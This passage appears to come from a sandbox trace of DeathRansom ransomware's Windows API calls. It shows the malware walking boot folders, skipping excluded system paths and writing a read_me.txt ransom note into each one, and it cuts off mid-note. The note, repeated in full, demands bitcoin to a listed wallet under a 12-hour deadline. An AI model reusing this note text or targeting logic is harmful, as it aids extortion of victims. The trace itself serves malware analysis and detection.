1 [0073.659] wnsprintfW (in: pszDest=0x8b100e8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt") returned 29 [0073.659] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt" (normalized: "c:\\boot\\pl-pl\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.659] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.659] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.660] CloseHandle (hObject=0x7a8) returned 1 [0073.660] GetProcessHeap () returned 0x280000 [0073.660] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b100e8 | out: hHeap=0x280000) returned 1 [0073.660] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0073.660] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0073.660] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0073.661] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0073.661] StrStrW (lpFirst="pt-br", lpSrch="programdata") returned 0x0 [0073.661] StrStrW (lpFirst="pt-br", lpSrch="$recycle.bin") returned 0x0 [0073.661] StrStrW (lpFirst="pt-br", lpSrch="program files") returned 0x0 [0073.661] StrStrW (lpFirst="pt-br", lpSrch="windows") returned 0x0 [0073.661] StrStrW (lpFirst="pt-br", lpSrch="all users") returned 0x0 [0073.661] StrStrW (lpFirst="pt-br", lpSrch="appdata") returned 0x0 [0073.661] GetProcessHeap () returned 0x280000 [0073.661] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b100e8 [0073.661] lstrcpyW (in: lpString1=0x8b100e8, lpString2="\\\\?\\C:\\Boot\\pt-BR" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR") returned="\\\\?\\C:\\Boot\\pt-BR" [0073.661] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 18 [0073.661] QueueUserWorkItem (Function=0x40a710, Context=0x8b100e8, Flags=0x0) returned 1 [0073.661] GetProcessHeap () returned 0x280000 [0073.661] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b200f0 [0073.662] wnsprintfW (in: pszDest=0x8b200f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0073.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.663] wnsprintfW (in: pszDest=0x8b200f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0073.663] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.663] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.663] wnsprintfW (in: pszDest=0x8b200f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0073.663] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.663] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.663] wnsprintfW (in: pszDest=0x8b200f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0073.663] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.663] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.663] wnsprintfW (in: pszDest=0x8b200f0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt") returned 29 [0073.663] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt" (normalized: "c:\\boot\\pt-br\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.664] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.664] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.664] CloseHandle (hObject=0x7a8) returned 1 [0073.665] GetProcessHeap () returned 0x280000 [0073.665] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b200f0 | out: hHeap=0x280000) returned 1 [0073.665] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0073.665] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0073.665] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0073.665] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0073.665] StrStrW (lpFirst="pt-pt", lpSrch="programdata") returned 0x0 [0073.665] StrStrW (lpFirst="pt-pt", lpSrch="$recycle.bin") returned 0x0 [0073.665] StrStrW (lpFirst="pt-pt", lpSrch="program files") returned 0x0 [0073.665] StrStrW (lpFirst="pt-pt", lpSrch="windows") returned 0x0 [0073.665] StrStrW (lpFirst="pt-pt", lpSrch="all users") returned 0x0 [0073.665] StrStrW (lpFirst="pt-pt", lpSrch="appdata") returned 0x0 [0073.665] GetProcessHeap () returned 0x280000 [0073.665] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b200f0 [0073.665] lstrcpyW (in: lpString1=0x8b200f0, lpString2="\\\\?\\C:\\Boot\\pt-PT" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT") returned="\\\\?\\C:\\Boot\\pt-PT" [0073.665] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 19 [0073.665] QueueUserWorkItem (Function=0x40a710, Context=0x8b200f0, Flags=0x0) returned 1 [0073.665] GetProcessHeap () returned 0x280000 [0073.665] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b300f8 [0073.666] wnsprintfW (in: pszDest=0x8b300f8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0073.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.666] wnsprintfW (in: pszDest=0x8b300f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0073.666] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.666] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.666] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.667] wnsprintfW (in: pszDest=0x8b300f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0073.667] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.667] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.667] wnsprintfW (in: pszDest=0x8b300f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0073.667] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.667] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.667] wnsprintfW (in: pszDest=0x8b300f8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt") returned 29 [0073.667] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt" (normalized: "c:\\boot\\pt-pt\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.667] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.667] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.668] CloseHandle (hObject=0x7a8) returned 1 [0073.668] GetProcessHeap () returned 0x280000 [0073.668] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b300f8 | out: hHeap=0x280000) returned 1 [0073.668] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0073.668] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0073.668] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0073.668] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0073.668] StrStrW (lpFirst="ru-ru", lpSrch="programdata") returned 0x0 [0073.669] StrStrW (lpFirst="ru-ru", lpSrch="$recycle.bin") returned 0x0 [0073.669] StrStrW (lpFirst="ru-ru", lpSrch="program files") returned 0x0 [0073.669] StrStrW (lpFirst="ru-ru", lpSrch="windows") returned 0x0 [0073.669] StrStrW (lpFirst="ru-ru", lpSrch="all users") returned 0x0 [0073.669] StrStrW (lpFirst="ru-ru", lpSrch="appdata") returned 0x0 [0073.669] GetProcessHeap () returned 0x280000 [0073.669] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b300f8 [0073.669] lstrcpyW (in: lpString1=0x8b300f8, lpString2="\\\\?\\C:\\Boot\\ru-RU" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU") returned="\\\\?\\C:\\Boot\\ru-RU" [0073.669] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 20 [0073.669] QueueUserWorkItem (Function=0x40a710, Context=0x8b300f8, Flags=0x0) returned 1 [0073.669] GetProcessHeap () returned 0x280000 [0073.669] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b40100 [0073.670] wnsprintfW (in: pszDest=0x8b40100, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0073.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.671] wnsprintfW (in: pszDest=0x8b40100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0073.671] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.671] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.671] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.671] wnsprintfW (in: pszDest=0x8b40100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0073.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.671] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.671] wnsprintfW (in: pszDest=0x8b40100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0073.671] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.671] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.671] wnsprintfW (in: pszDest=0x8b40100, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt") returned 29 [0073.671] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt" (normalized: "c:\\boot\\ru-ru\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.671] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 